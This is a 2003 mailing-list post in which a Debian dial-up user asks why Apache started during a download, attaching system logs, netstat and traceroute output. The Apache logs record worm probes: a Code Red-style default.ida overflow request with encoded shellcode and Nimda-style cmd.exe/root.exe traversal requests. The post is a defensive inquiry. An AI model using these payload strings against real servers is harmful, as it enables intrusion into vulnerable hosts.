port 80 access while downloading over ppp?
Hello,
I know this isn't strictly laptop related, but I really would like to
learn what was happening, and I know quite a few networkers on this
list. Perhaps you can give me your opinion?
Last night I was downloading with apt over a slow modem when I noticed that something
had started Apache processes on my box (Debian woody 3.0r1).
Apache is started from inetd here, listening on port 80, just for local
document reading (like dhelp).
I'm on a standard serial modem ppp dialup, with a NIC occasionally connected
to a little local LAN (but no route to the internet).
First I thought of some weird interference between running processes.
Then I read 'cmd.exe' in the Apache log, and I got worried that someone was trying to
access my (assumed Windows) box. Now I think I really have no clue.
When online, a wwwoffle proxy is started from ip-up (mainly as a web cache),
listening on localhost:8080. I wonder if wwwoffle could cache some
strange JavaScripts? I'll go ask this on the wwwoffle list.
Meanwhile I tried some diagnosis, but as I said, I am rather inexperienced
and didn't know what to do. E.g. I didn't note the exact time of my stats.
I don't know what information would be important to interpret the issue.
I just attach all of my few collected logs.
Greets
--
mi <mrl>
--------------------------------------------------------------------------------------------------------
Date: Jul 10 2003 after midnight
... = skipped log entries
( ) = my comments (mostly to remind myself)
------------------ Log entries -------------------------------
============= pppd log (overview of connected time)
Jul 9 23:35:43 woody pppd[1133]: pppd 2.4.1 started by michl, uid 1000
... (chat)
Jul 9 23:36:15 woody chat[1134]: -- got it
Jul 9 23:36:15 woody chat[1134]: send (\d)
Jul 9 23:36:16 woody pppd[1133]: Serial connection established.
Jul 9 23:36:16 woody pppd[1133]: using channel 3
Jul 9 23:36:16 woody pppd[1133]: Using interface ppp0
Jul 9 23:36:16 woody pppd[1133]: Connect: ppp0 <--> /dev/ttyS0
Jul 9 23:36:17 woody pppd[1133]: sent [LCP ConfReq id=0x1 <asyncmap 0x0>
<magic 0x24f2079d> <pcomp> <accomp>]
...
...
Jul 9 23:36:27 woody pppd[1133]: local IP address 213.218.5.248
Jul 9 23:36:27 woody pppd[1133]: remote IP address 195.2.163.147
Jul 9 23:36:27 woody pppd[1133]: primary DNS address 212.126.200.40
Jul 9 23:36:27 woody pppd[1133]: secondary DNS address 195.2.171.40
Jul 9 23:36:27 woody pppd[1133]: Script /etc/ppp/ip-up started (pid 1150)
Jul 9 23:36:29 woody pppd[1133]: Script /etc/ppp/ip-up finished (pid 1150),
status = 0x1
-> apt-download and apache-thing (noticed around 00:50)
Jul 10 00:56:01 woody pppd[1133]: Terminating on signal 15.
Jul 10 00:56:01 woody pppd[1133]: Script /etc/ppp/ip-down started (pid 1721)
..
Jul 10 00:56:01 woody pppd[1133]: Connect time 79.8 minutes.
Jul 10 00:56:01 woody pppd[1133]: Sent 546535 bytes, received 21016901 bytes.
...
Jul 10 00:56:01 woody pppd[1133]: Exit.
================= Custom console log:
Jul 9 23:36:27 woody logger: ==== ip-up: executing dns: ====
Jul 9 23:36:27 woody logger: xxxxxxxxx ntpdate: Checking timestamp xxxxxxxxx
... (updating time from 130.133.1.10)
Jul 9 23:36:27 woody logger: time-stamp: 09.07.2003
Jul 9 23:36:27 woody logger: date-day: 09.07.2003
Jul 9 23:36:27 woody logger: Date clock:Wed Jul 9 23:36:27 CEST 2003
Jul 9 23:36:27 woody logger: System clock:Wed Jul 9 23:36:28
Jul 9 23:36:27 woody logger: Timesatamp of today -- ok, exiting.
Jul 9 23:36:27 woody logger: xxxxxxxxx ntpdate: .... done. xxxxxxxxxx
Jul 9 23:36:28 woody wwwoffled[1219]: WWWOFFLE Demon Version 2.7a (with
zlib,without ipv6) started.
... (local web-cache proxy)
Jul 9 23:36:28 woody wwwoffled[1225]: Detached from terminal and changed pid
to 1225.
Jul 9 23:36:28 woody wwwoffled[1225]: WWWOFFLE Connection from host woody
(127.0.0.1).
Jul 9 23:36:28 woody wwwoffled[1225]: WWWOFFLE Online.
Jul 9 23:36:29 woody logger: ==== ip-up: .... finished. ====
... ( aptitude 'go' requesting a cd before starting download:)
Jul 9 23:37:29 woody kernel: ISO 9660 Extensions: Microsoft Joliet Level 3
Jul 9 23:37:30 woody kernel: ISO 9660 Extensions: RRIP_1991A
... (download starting)
Jul 10 00:00:24 woody -- MARK --
Jul 10 00:20:24 woody -- MARK --
( Suddenly something called port 80, which invoked apache.
My local IP is 213.218.5.248, remote is 195.2.bla )
Jul 10 00:21:41 woody apache[1537]: connect from 213.157.182.3
Jul 10 00:40:24 woody -- MARK --
Jul 10 00:43:11 woody apache[1609]: connect from 213.37.21.54
Jul 10 00:43:16 woody apache[1610]: connect from 213.37.21.54
Jul 10 00:43:22 woody apache[1611]: connect from 213.37.21.54
Jul 10 00:43:28 woody apache[1612]: connect from 213.37.21.54
Jul 10 00:43:34 woody apache[1613]: connect from 213.37.21.54
Jul 10 00:43:40 woody apache[1615]: connect from 213.37.21.54
Jul 10 00:43:47 woody apache[1616]: connect from 213.37.21.54
Jul 10 00:43:55 woody apache[1617]: connect from 213.37.21.54
Jul 10 00:44:04 woody apache[1618]: connect from 213.37.21.54
Jul 10 00:44:13 woody apache[1619]: connect from 213.37.21.54
Jul 10 00:44:24 woody apache[1620]: connect from 213.37.21.54
...
(No more entries. Around 00:50 I started some tracking,
including ping and traceroute, around 00:54 apt finished,
and at 00:56 I shut down the ppp link)
========== apache error.log (this is the interesting stuff ;-)
(log snip starting from day before with local connection standard
message)
[Wed Jul 9 01:59:24 2003] [info] mod_unique_id: using ip addr 127.0.0.1
[Thu Jul 10 00:21:44 2003] [error] [client 213.157.182.3] File does not exist:
/var/www/default.ida
[Thu Jul 10 00:43:12 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/scripts/root.exe
[Thu Jul 10 00:43:17 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/MSADC/root.exe
[Thu Jul 10 00:43:23 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/c/winnt/system32/cmd.exe
[Thu Jul 10 00:43:29 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/d/winnt/system32/cmd.exe
[Thu Jul 10 00:43:35 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/scripts/..%5c../winnt/system32/cmd.exe
[Thu Jul 10 00:43:41 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Thu Jul 10 00:43:48 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
[Thu Jul 10 00:43:56 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
[Thu Jul 10 00:44:05 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/scripts/..Á../winnt/system32/cmd.exe
[Thu Jul 10 00:44:25 2003] [error] [client 213.37.21.54] File does not exist:
/var/www/scripts/..À¯../winnt/system32/cmd.exe
(no more log entries)
========== apache access log:
127.0.0.1 - - [09/Jul/2003:22:56:32 +0200] "GET
/?xml+version=%221.0%22?%3E%3C!DOCTYPE+xbel+PUBLIC+%22+//IDN+python.org//DTD+XML+Bookmark+Exchange+Language+1.0//EN//XML%22+%22http://www.python.org/topics/xml/dtds/xbel-1.0.dtd%22%3E%3Cxbel+version=%221.0%22%3E++%3Ctitle%3EDummy+folder%3C/title%3E++%3Cbookmark+href=%22http://www.cs.hmc.edu/~me/linux/dell_inspiron_4150.html%22%3E++++%3Ctitle%3EInspiron+4150+++Debian%3C/title%3E++++%3Cinfo%3E++++++%3Cmetadata+owner=%22http://galeon.sourceforge.net/%22%3E++++++++%3Ctime_added%3E1047242448%3C/time_added%3E++++++%3C/metadata%3E++++%3C/info%3E++%3C/bookmark%3E%3C/xbel%3E
HTTP/1.0" 200 4120 "-" "Mozilla/5.0 Galeon/1.2.6 (X11; Linux i586; U;)
Gecko/20021127 Debian/1.2.6-2"
(this was my galeon browser last evening)
213.157.182.3 - - [10/Jul/2003:00:21:44 +0200] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
HTTP/1.0" 404 303 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:12 +0200] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 308 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:17 +0200] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 306 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:23 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:29 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 316 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:35 +0200] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 330 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:41 +0200] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 347 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:48 +0200] "GET
/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 347 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:43:56 +0200] "GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 363 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:44:05 +0200] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:44:14 +0200] "GET
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
213.37.21.54 - - [10/Jul/2003:00:44:25 +0200] "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
--------------- Humble diagnosis started around 00:50 ---------------------
========== netstat -a
Aktive Internetverbindungen (Server und stehende Verbindungen)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:32768 *:* LISTEN
tcp 0 0 *:32769 *:* LISTEN
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:time *:* LISTEN
tcp 0 0 *:7110 *:* LISTEN
tcp 0 0 *:discard *:* LISTEN
tcp 0 0 *:daytime *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:webcache *:* LISTEN
tcp 0 0 *:x11 *:* LISTEN
tcp 0 0 *:10000 *:* LISTEN
tcp 0 0 *:www *:* LISTEN
tcp 0 0 *:tproxy *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 dip-248.breisnet-:33070 tutankhamon.acc.umu:www VERBUNDEN
tcp 15 0 dip-248.breisnet-:33069 klecker.debian.org:ftp CLOSE_WAIT
udp 0 0 *:32768 *:*
udp 0 0 *:2049 *:*
udp 0 0 *:32770 *:*
udp 0 0 *:32771 *:*
udp 0 0 *:talk *:*
udp 0 0 *:ntalk *:*
udp 0 0 *:discard *:*
udp 0 0 *:10000 *:*
udp 0 0 *:789 *:*
udp 0 0 *:sunrpc *:*
Aktive Sockets in der UNIX Domäne (Server und stehende Verbindungen)
Proto RefZäh Flaggen Typ Zustand I-Node Pfad
unix 2 [ ACC ] STREAM HÖRT 508 /var/run/lprng/socket
unix 2 [ ACC ] STREAM HÖRT 1564
/tmp/.font-unix/fs7110
unix 2 [ ACC ] STREAM HÖRT 2010
/tmp/ksocket-michl/kdeinit-:0
unix 2 [ ACC ] STREAM HÖRT 2043
/tmp/ksocket-michl/klauncherUe9Vub.slave-socket
unix 2 [ ACC ] STREAM HÖRT 1743 /tmp/.X11-unix/X0
unix 2 [ ACC ] STREAM HÖRT 2015
/tmp/.ICE-unix/dcop602-1057782131
unix 8 [ ] DGRAM 177 /dev/log
unix 2 [ ACC ] STREAM HÖRT 110616 /dev/gpmctl
unix 2 [ ACC ] STREAM HÖRT 1770
/tmp/ssh-XXYdB1Me/agent.555
unix 2 [ ACC ] STREAM HÖRT 2075
/tmp/orbit-michl/orb-2061394323126919559
unix 2 [ ACC ] STREAM HÖRT 2084
/tmp/orbit-michl/linc-262-0-4dc27b523a548
unix 2 [ ACC ] STREAM HÖRT 2099
/tmp/orbit-michl/orb-1680828554582378315
unix 3 [ ] STREAM VERBUNDEN 111500 /dev/gpmctl
unix 3 [ ] STREAM VERBUNDEN 111499
unix 2 [ ] DGRAM 110458
unix 2 [ ] DGRAM 70176
unix 2 [ ] DGRAM 63330
unix 3 [ ] STREAM VERBUNDEN 2210 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2209
unix 3 [ ] STREAM VERBUNDEN 2208
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2207
unix 3 [ ] STREAM VERBUNDEN 2198 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2197
unix 3 [ ] STREAM VERBUNDEN 2196
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2195
unix 3 [ ] STREAM VERBUNDEN 2194 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2193
unix 3 [ ] STREAM VERBUNDEN 2109
/tmp/orbit-michl/orb-1680828554582378315
unix 3 [ ] STREAM VERBUNDEN 2106
unix 3 [ ] STREAM VERBUNDEN 2094
/tmp/orbit-michl/orb-2061394323126919559
unix 3 [ ] STREAM VERBUNDEN 2093
unix 3 [ ] STREAM VERBUNDEN 2092
/tmp/orbit-michl/linc-262-0-4dc27b523a548
unix 3 [ ] STREAM VERBUNDEN 2091
unix 2 [ ] DGRAM 2083
unix 3 [ ] STREAM VERBUNDEN 2070 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2069
unix 3 [ ] STREAM VERBUNDEN 2054 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2053
unix 3 [ ] STREAM VERBUNDEN 2050
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2049
unix 3 [ ] STREAM VERBUNDEN 2036
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2035
unix 3 [ ] STREAM VERBUNDEN 2030
unix 3 [ ] STREAM VERBUNDEN 2029
unix 3 [ ] STREAM VERBUNDEN 1965 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1964
unix 3 [ ] STREAM VERBUNDEN 1945 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1944
unix 3 [ ] STREAM VERBUNDEN 1773 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1772
unix 3 [ ] STREAM VERBUNDEN 1749
/tmp/.font-unix/fs7110
unix 3 [ ] STREAM VERBUNDEN 1748
unix 3 [ ] STREAM VERBUNDEN 1751 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1745
unix 2 [ ] DGRAM 408
unix 2 [ ] DGRAM 210
========== ifconfig
(eth0 not connected)
lo Protokoll:Lokale Schleife
inet Adresse:127.0.0.1 Maske:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:6284 errors:0 dropped:0 overruns:0 frame:0
TX packets:6284 errors:0 dropped:0 overruns:0 carrier:0
Kollisionen:0 Sendewarteschlangenlänge:0
RX bytes:1758729 (1.6 MiB) TX bytes:1758729 (1.6 MiB)
ppp0 Protokoll:Punkt-zu-Punkt Verbindung
inet Adresse:213.218.5.248 P-z-P:195.2.163.147
Maske:255.255.255.255
UP PUNKTZUPUNKT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:13643 errors:222 dropped:0 overruns:0 frame:0
TX packets:9358 errors:0 dropped:0 overruns:0 carrier:0
Kollisionen:0 Sendewarteschlangenlänge:3
RX bytes:20079433 (19.1 MiB) TX bytes:507610 (495.7 KiB)
=========== route
Kernel IP Routentabelle
Ziel Router Genmask Flags Metric Ref Use Iface
pm3-fr2.toplink * 255.255.255.255 UH 0 0 0 ppp0
woodynic * 255.255.255.0 U 0 0 0 eth0
default pm3-fr2.toplink 0.0.0.0 UG 0 0 0 ppp0
============ ping 213.37.21.54
64 bytes from 213.37.21.54: icmp_seq=0 ttl=105 time=3701.8 ms
64 bytes from 213.37.21.54: icmp_seq=1 ttl=105 time=3842.0 ms
64 bytes from 213.37.21.54: icmp_seq=2 ttl=105 time=4009.2 ms
64 bytes from 213.37.21.54: icmp_seq=3 ttl=105 time=3600.0 ms
64 bytes from 213.37.21.54: icmp_seq=4 ttl=105 time=3760.0 ms
64 bytes from 213.37.21.54: icmp_seq=5 ttl=105 time=3630.0 ms
--- 213.37.21.54 ping statistics ---
9 packets transmitted, 6 packets received, 33% packet loss
round-trip min/avg/max = 3600.0/3757.1/4009.2 ms
============ traceroute 213.37.21.54 (meanwhile apt download finished)
1 pm3-fr2.toplink-plannet.de (195.2.163.147) 135.167 ms 129.648 ms
119.909 ms
2 a391c.fe0-0-2.frances.fre1.toplink-plan.net (195.2.163.145) 119.987 ms
121.406 ms 119.941 ms
3 bca1e.ser6-0.susan.stu1.toplink-plan.net (195.2.188.161) 129.954 ms
119.903 ms 119.837 ms
4 c032e.ser6-0.kay.kar1.toplink-plan.net (212.126.192.50) 119.959 ms
129.809 ms 189.951 ms
5 c892c.bbo1.carmen.kar1.toplink-plan.net (212.126.200.146) 129.957 ms
119.829 ms 120.051 ms
6 1e11c.bbo4.franca.fra3.toplink-plan.net (213.218.30.17) 138.241 ms
139.860 ms 129.956 ms
7 24e9d.1.level3.ups.fra3.toplink-plan.net (62.67.36.233) 140.273 ms
130.399 ms 119.423 ms
8 ae0-55.mp1.Frankfurt1.Level3.net (195.122.136.97) 119.853 ms 139.829 ms
119.950 ms
9 so-0-0-0.mp1.London2.Level3.net (212.187.128.61) 139.879 ms 139.886 ms
149.948 ms
10 so-1-0-0.bbr1.Washington1.level3.net (212.187.128.138) 219.904 ms
209.861 ms 209.913 ms
11 so-6-0-0.edge1.Washington1.Level3.net (209.244.11.10) 219.926 ms 209.820
ms 219.946 ms
12 65.59.88.210 (65.59.88.210) 229.919 ms 209.792 ms 209.959 ms
13 if-5-0.core1.Newark.Teleglobe.net (66.110.8.18) 219.956 ms 219.952 ms
229.639 ms
14 if-7-0.core2.Newark.Teleglobe.net (207.45.222.162) 228.369 ms 229.811 ms
219.929 ms
15 if-8-0.core2.London2.Teleglobe.net (66.110.8.142) 309.909 ms 289.833 ms
299.938 ms
16 if-5-0.core1.London2.teleglobe.net (195.219.15.217) 299.900 ms 289.823
ms 299.926 ms
17 if-5-0.core1.Madrid.Teleglobe.net (195.219.133.61) 329.950 ms 338.502 ms
321.244 ms
18 if-6-0.core2.Madrid.Teleglobe.net (195.219.149.77) 329.939 ms 319.830 ms
329.919 ms
19 * * *
20 10.127.1.26 (10.127.1.26) 330.034 ms 329.843 ms 329.894 ms
21 62.100.101.6 (62.100.101.6) 329.972 ms 329.831 ms 329.963 ms
22 10.21.2.100 (10.21.2.100) 330.034 ms 329.907 ms 329.882 ms
23 10.42.211.2 (10.42.211.2) 320.006 ms 370.627 ms 329.220 ms
24 213.37.21.54 (213.37.21.54) 799.852 ms * 601.702 ms
========== apt sources.list download targets (dns pinged)
ftp://ftp.de.debian.org (141.76.2.4)
ftp://security.debian.org (194.109.137.218)
# GNOME 2 Backports:
http://mirror.raw.no/ (129.241.93.49)
http://ftp.acc.umu.se/ (130.239.18.173)
----------------- Later comparisons -----------------------
=========== netstat -a after apt download finished (same ppp link open)
Aktive Internetverbindungen (Server und stehende Verbindungen)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:32768 *:* LISTEN
tcp 0 0 *:32769 *:* LISTEN
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:time *:* LISTEN
tcp 0 0 *:7110 *:* LISTEN
tcp 0 0 *:discard *:* LISTEN
tcp 0 0 *:daytime *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:webcache *:* LISTEN
tcp 0 0 *:x11 *:* LISTEN
tcp 0 0 *:10000 *:* LISTEN
tcp 0 0 *:www *:* LISTEN
tcp 0 0 *:tproxy *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
udp 0 0 *:32768 *:*
udp 0 0 *:2049 *:*
udp 0 0 *:32770 *:*
udp 0 0 *:32771 *:*
udp 0 0 *:talk *:*
udp 0 0 *:ntalk *:*
udp 0 0 *:discard *:*
udp 0 0 *:10000 *:*
udp 0 0 *:789 *:*
udp 0 0 *:sunrpc *:*
Aktive Sockets in der UNIX Domäne (Server und stehende Verbindungen)
Proto RefZäh Flaggen Typ Zustand I-Node Pfad
unix 2 [ ACC ] STREAM HÖRT 508 /var/run/lprng/socket
unix 2 [ ACC ] STREAM HÖRT 1564
/tmp/.font-unix/fs7110
unix 2 [ ACC ] STREAM HÖRT 2010
/tmp/ksocket-michl/kdeinit-:0
unix 2 [ ACC ] STREAM HÖRT 2043
/tmp/ksocket-michl/klauncherUe9Vub.slave-socket
unix 2 [ ACC ] STREAM HÖRT 1743 /tmp/.X11-unix/X0
unix 2 [ ACC ] STREAM HÖRT 2015
/tmp/.ICE-unix/dcop602-1057782131
unix 8 [ ] DGRAM 177 /dev/log
unix 2 [ ACC ] STREAM HÖRT 110616 /dev/gpmctl
unix 2 [ ACC ] STREAM HÖRT 1770
/tmp/ssh-XXYdB1Me/agent.555
unix 2 [ ACC ] STREAM HÖRT 2075
/tmp/orbit-michl/orb-2061394323126919559
unix 2 [ ACC ] STREAM HÖRT 2084
/tmp/orbit-michl/linc-262-0-4dc27b523a548
unix 2 [ ACC ] STREAM HÖRT 2099
/tmp/orbit-michl/orb-1680828554582378315
unix 3 [ ] STREAM VERBUNDEN 116566 /dev/gpmctl
unix 3 [ ] STREAM VERBUNDEN 116565
unix 3 [ ] STREAM VERBUNDEN 111500 /dev/gpmctl
unix 3 [ ] STREAM VERBUNDEN 111499
unix 2 [ ] DGRAM 110458
unix 2 [ ] DGRAM 70176
unix 2 [ ] DGRAM 63330
unix 3 [ ] STREAM VERBUNDEN 2210 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2209
unix 3 [ ] STREAM VERBUNDEN 2208
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2207
unix 3 [ ] STREAM VERBUNDEN 2198 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2197
unix 3 [ ] STREAM VERBUNDEN 2196
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2195
unix 3 [ ] STREAM VERBUNDEN 2194 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2193
unix 3 [ ] STREAM VERBUNDEN 2109
/tmp/orbit-michl/orb-1680828554582378315
unix 3 [ ] STREAM VERBUNDEN 2106
unix 3 [ ] STREAM VERBUNDEN 2094
/tmp/orbit-michl/orb-2061394323126919559
unix 3 [ ] STREAM VERBUNDEN 2093
unix 3 [ ] STREAM VERBUNDEN 2092
/tmp/orbit-michl/linc-262-0-4dc27b523a548
unix 3 [ ] STREAM VERBUNDEN 2091
unix 2 [ ] DGRAM 2083
unix 3 [ ] STREAM VERBUNDEN 2070 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2069
unix 3 [ ] STREAM VERBUNDEN 2054 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2053
unix 3 [ ] STREAM VERBUNDEN 2050
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2049
unix 3 [ ] STREAM VERBUNDEN 2036
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2035
unix 3 [ ] STREAM VERBUNDEN 2030
unix 3 [ ] STREAM VERBUNDEN 2029
unix 3 [ ] STREAM VERBUNDEN 1965 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1964
unix 3 [ ] STREAM VERBUNDEN 1945 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1944
unix 3 [ ] STREAM VERBUNDEN 1773 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1772
unix 3 [ ] STREAM VERBUNDEN 1749
/tmp/.font-unix/fs7110
unix 3 [ ] STREAM VERBUNDEN 1748
unix 3 [ ] STREAM VERBUNDEN 1751 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 1745
unix 2 [ ] DGRAM 408
unix 2 [ ] DGRAM 210
======== netstat -a with ppp0 down
Aktive Internetverbindungen (Server und stehende Verbindungen)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 *:32768 *:* LISTEN
tcp 0 0 *:32769 *:* LISTEN
tcp 0 0 *:printer *:* LISTEN
tcp 0 0 *:time *:* LISTEN
tcp 0 0 *:7110 *:* LISTEN
tcp 0 0 *:discard *:* LISTEN
tcp 0 0 *:daytime *:* LISTEN
tcp 0 0 *:finger *:* LISTEN
tcp 0 0 *:sunrpc *:* LISTEN
tcp 0 0 *:webcache *:* LISTEN
tcp 0 0 *:x11 *:* LISTEN
tcp 0 0 *:10000 *:* LISTEN
tcp 0 0 *:www *:* LISTEN
tcp 0 0 *:tproxy *:* LISTEN
tcp 0 0 *:auth *:* LISTEN
tcp 0 0 *:ftp *:* LISTEN
tcp 0 0 *:telnet *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 woody:tproxy woody:33073 TIME_WAIT
udp 0 0 *:32768 *:*
udp 0 0 *:2049 *:*
udp 0 0 *:32770 *:*
udp 0 0 *:32771 *:*
udp 0 0 *:talk *:*
udp 0 0 *:ntalk *:*
udp 0 0 *:discard *:*
udp 0 0 *:10000 *:*
udp 0 0 *:789 *:*
udp 0 0 *:sunrpc *:*
Aktive Sockets in der UNIX Domäne (Server und stehende Verbindungen)
Proto RefZäh Flaggen Typ Zustand I-Node Pfad
unix 2 [ ACC ] STREAM HÖRT 508 /var/run/lprng/socket
unix 2 [ ACC ] STREAM HÖRT 1564
/tmp/.font-unix/fs7110
unix 2 [ ACC ] STREAM HÖRT 2010
/tmp/ksocket-michl/kdeinit-:0
unix 2 [ ACC ] STREAM HÖRT 2043
/tmp/ksocket-michl/klauncherUe9Vub.slave-socket
unix 2 [ ACC ] STREAM HÖRT 1743 /tmp/.X11-unix/X0
unix 2 [ ACC ] STREAM HÖRT 2015
/tmp/.ICE-unix/dcop602-1057782131
unix 7 [ ] DGRAM 177 /dev/log
unix 2 [ ACC ] STREAM HÖRT 110616 /dev/gpmctl
unix 2 [ ACC ] STREAM HÖRT 1770
/tmp/ssh-XXYdB1Me/agent.555
unix 2 [ ACC ] STREAM HÖRT 2075
/tmp/orbit-michl/orb-2061394323126919559
unix 2 [ ACC ] STREAM HÖRT 2084
/tmp/orbit-michl/linc-262-0-4dc27b523a548
unix 2 [ ACC ] STREAM HÖRT 2099
/tmp/orbit-michl/orb-1680828554582378315
unix 3 [ ] STREAM VERBUNDEN 116566 /dev/gpmctl
unix 3 [ ] STREAM VERBUNDEN 116565
unix 3 [ ] STREAM VERBUNDEN 111500 /dev/gpmctl
unix 3 [ ] STREAM VERBUNDEN 111499
unix 2 [ ] DGRAM 110458
unix 2 [ ] DGRAM 70176
unix 3 [ ] STREAM VERBUNDEN 2210 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2209
unix 3 [ ] STREAM VERBUNDEN 2208
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2207
unix 3 [ ] STREAM VERBUNDEN 2198 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2197
unix 3 [ ] STREAM VERBUNDEN 2196
/tmp/.ICE-unix/dcop602-1057782131
unix 3 [ ] STREAM VERBUNDEN 2195
unix 3 [ ] STREAM VERBUNDEN 2194 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2193
unix 3 [ ] STREAM VERBUNDEN 2109
/tmp/orbit-michl/orb-1680828554582378315
unix 3 [ ] STREAM VERBUNDEN 2106
unix 3 [ ] STREAM VERBUNDEN 2094
/tmp/orbit-michl/orb-2061394323126919559
unix 3 [ ] STREAM VERBUNDEN 2093
unix 3 [ ] STREAM VERBUNDEN 2092
/tmp/orbit-michl/linc-262-0-4dc27b523a548
unix 3 [ ] STREAM VERBUNDEN 2091
unix 2 [ ] DGRAM 2083
unix 3 [ ] STREAM VERBUNDEN 2070 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2069
unix 3 [ ] STREAM VERBUNDEN 2054 /tmp/.X11-unix/X0
unix 3 [ ] STREAM VERBUNDEN 2053
unix 3 [ ] STREAM VERBUNDEN 2050
